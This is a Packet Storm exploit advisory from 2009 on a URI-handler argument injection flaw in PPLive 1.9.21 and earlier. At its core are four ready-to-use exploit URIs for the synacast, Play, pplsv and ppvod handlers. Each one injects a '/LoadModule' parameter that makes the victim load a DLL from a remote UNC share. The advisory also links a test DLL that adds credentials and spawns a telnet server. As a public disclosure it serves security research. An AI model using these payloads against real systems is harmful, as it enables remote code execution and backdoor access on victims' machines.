exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PPLive 1.9.21 Argument Injection

PPLive 1.9.21 Argument Injection
Posted Mar 16, 2009
Authored by Nine:Situations:Group | Site retrogod.altervista.org

PPLive versions 1.9.21 and below suffer from a URI handler argument injection vulnerability.

tags | exploit
SHA-256 | 6b519876a5ddbbf84a7a7e31fbfb4c67cf6f9a2868b6168a7fd4a8c09fb223fa

PPLive 1.9.21 Argument Injection

Change Mirror Download
--------------------------------------------------------------------------------
PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection
by Nine:Situations:Group::strawdog
--------------------------------------------------------------------------------
software site:http://www.pplive.com/en/index.html
our site: http://retrogod.altervista.org/

software description:
"PPLive is a peer-to-peer streaming video network created in Huazhong University
of Science and Technology, People's Republic of China. It is part of a new
generation of P2P applications, that combine P2P and Internet TV, called P2PTV."

vulnerability:
The "synacast://", "Play://" ,"pplsv://" and "ppvod://" URI handlers do not
verify certain parts of the URI before evaluating command line parameters.
This can be exploited against Internet Explorer to e.g. load a dll from a remote
UNC path via the "/LoadModule" parameter, example exploit (IE7):

synacast://www.microsoft.com/?"%20/LoadModule%20\1.2.3.4\unc_share\sh.dll%20"
Play://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"

against older versions:
pplsv://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
ppvod://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"

test dll which adds new credentials / spawns the telnet server:
http://retrogod.altervista.org/9sg_pplive_sh.html

some interesting readings:
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx

--------------------------------------------------------------------------------


Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close